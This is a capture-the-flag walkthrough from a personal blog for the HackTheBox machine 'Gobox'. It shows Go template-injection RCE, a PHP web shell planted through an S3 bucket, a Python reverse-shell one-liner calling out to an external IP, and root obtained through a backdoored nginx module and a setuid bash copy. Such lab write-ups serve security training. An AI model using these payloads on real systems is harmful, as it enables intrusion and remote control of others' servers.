Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

Enumeration/Scanning With Nmap

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.11.113]
└─$ cat nmap.nmap         
# Nmap 7.91 scan initiated Tue Sep  7 13:14:57 2021 as: nmap -sC -sV -oA nmap 10.10.11.113
Nmap scan report for 10.10.11.113
Host is up (0.78s latency).
Not shown: 994 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http       nginx
|_http-title: Hacking eSports | 
8080/tcp open     http       nginx
|_http-title: Hacking eSports | Home page
9000/tcp filtered cslistener
9001/tcp filtered tor-orport
9002/tcp filtered dynamid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep  7 13:17:49 2021 -- 1 IP address (1 host up) scanned in 171.57 seconds

We are having 3 open ports 22,80 and 8080 seems cool the rest is filtered now let go through the port 80 first which is the HTTP.

image

A nice homepage i will say lol checking robots.txt nothing but seems we have double index page which is index.html,index.php .

image

Index.html bring out a test page only when the index.php bring out the normal homepage i try bursting some directories but got nothing interesting now time to jump to the port 8080.

image

A Login page is it vulnerable to SQL Injection let give it a try but i spend sometime on the login page and i go nothing but checking the title of the login page i found something strange the title is looking like an SSTI (Server Side Template Injection) payload.

image

So i click on the forgot password page to test the page for SSTI vulnerability but knowing the template engine will help a lot so i try intercepting the request with Burp suite.

image

Nice checking the response and i can see X-Forwarded-Server: golang ahhh seems the server is written in Go i Know it running nginx also but the template engine is GO yes it the same now i quickly hit google to find some SSTI payload in GO.

image

Found some cool website that explain more in exploiting SSTI in Go SSTI In Go.

image

Send the request to repeater to try my payload i got Email Sent To: ssti nice a work in progress let dig more.

image

Ahhhh cool got some creds to log into the website but nothing interesting it just a source code.

image

Now trying To get RCE seems the DebugCmd function look interesting.

func (u User) DebugCmd (test string) string {
  ipp := strings.Split(test, " ")
  bin := strings.Join(ipp[:1], " ")
  args := strings.Join(ipp[1:], " ")
  if len(args) > 0{
    out, _ := exec.Command(bin, args).CombinedOutput()
    return string(out)
  } else {
    out, _ := exec.Command(bin).CombinedOutput()
    return string(out)
  }
}

It isn’t used anywhere else in the page, but it exists. Using Functions Inside Go Templates This post talks about how to reference objects (including functions) from the templating engine using a .function_name. Submitting `` returns proof of execution.

image

Boom we have RCE was stuck here for long man i keep trying to get a reverse shell back to my terminal but no luck i try diff reverse shell payloads but got nothing let try checking the hostname.

image

Aws Cool and seems we are in docker env also and the hostname give a clear hint that we are dealing with s3 bucket.

image

AWS Command

aws s3 ls  // to see buckets

image

aws s3 ls s3://website

image

Ahhh seems the buckets is on port 80 nice now let try to upload a file on the target.

UPLOADING A FILE WITH THE RCE AND USING AWS To TRANSFER IT TO PORT 80

<?php echo system($_GET["cmd"]); ?>

image

                                                                                                                                                                       
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.11.113]
└─$ cat shell.php | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz4K

image


Let confirm if we have our file in the tmp dircetory.

image

Ahhh awesome we have it now let copy it to port 80 with aws.

image

aws s3 cp /tmp/rev s3://website/rev.php

Now let confirm it on port 80 which is the HTTP.

image

Boom a webshell now let get a reverse shell back to our terminal.

SHELL

image

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

Now let spawn a TTY shell.

image

python3 -c 'import pty; pty.spawn ("/bin/bash")'

Now let get the user.txt in the home directory of the user ubuntu .

image

Privilege Escalation

Ahhh the hard the part man i was stuck here for so long all thanks to my buddy c3p0d4y for the nudge i love you man so let hit it. The root part is pretty new to me like damn it was fun.

image

Kernal version but nothing thinking it vulnerable to overlayfs but it probably patched lol let check the ports that is running locally on the target.

www-data@gobox:~/html$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:4566            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9000            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:9001            0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::9000                 :::*                    LISTEN      -                   
tcp6       0      0 :::9001                 :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
www-data@gobox:~/html$ 

We have some pretty strange ports and the hint i got was dig into /etc/nginx/modules-enabled thanks again c3p0d4y

image

50-backdoor.conf look strange let dig into it.

image

So i decided to know more about the module so it hit google to do some research on it.

image

The first one look promising let check it out.

The NginxExecute module executes the shell command through GET and POST to display the result.

Configuration example:

location ... {
            ......
            command on;
        }

    worker_processes  2;
    events {
        worker_connections  1024;
    }
    http {
        include       mime.types;
        default_type  application/octet-stream;
        sendfile        on;
        keepalive_timeout  65;
        server {
            listen       80;
            server_name  localhost;
            location / {
                root   html;
                index  index.html index.htm;
                command on;
            }
            error_page   500 502 503 504  /50x.html;
            location = /50x.html {
                root   html;
            }
        }
    }

Usage: view-source:http://192.168.18.22/?system.run[command] or curl -g "http://192.168.18.22/?system.run[command]" The command can be any system command. The command you will want to use depends on the permissions that nginx runs with.

view-source:http://192.168.18.22/?system.run[ifconfig]

Let locate the module on the target.

image

But when i try it i got failed.

image

So i decided to strings the module.

image

ippsec.run

Now let try it again.

image

Boom that is some good sh*t lol now let get the flag.

image

We have the root flag but man that is not fun without a real root shell lol.

image

www-data@gobox:/usr/lib/nginx/modules$ curl -g "http://127.0.0.1:8000/?ippsec.run[chmod 777 /tmp/bash]"
<://127.0.0.1:8000/?ippsec.run[chmod 777 /tmp/bash]"
curl: (52) Empty reply from server
www-data@gobox:/usr/lib/nginx/modules$ ls /tmp/bash
ls /tmp/bash
/tmp/bash
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
www-data@gobox:/usr/lib/nginx/modules$ ls -la /tmp/bash
ls -la /tmp/bash
-rwxrwxrwx 1 root root 1183448 Sep  8 17:16 /tmp/bash
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
www-data@gobox:/usr/lib/nginx/modules$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@gobox:/usr/lib/nginx/modules$  curl 'http://127.0.0.1:8000?ippsec.run[chmod%204777%20%2ftmp%2fbash]'
<.0.1:8000?ippsec.run[chmod%204777%20%2ftmp%2fbash]'
curl: (52) Empty reply from server
www-data@gobox:/usr/lib/nginx/modules$ /tmp/bash -p
/tmp/bash -p
bash-5.0# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
bash-5.0# cd /root
cd /root
bash-5.0# ls
ls
iptables.sh  root.txt  snap
bash-5.0# 

With some trial and error i got it and we are done.

Greeting From Muzec



Back To Home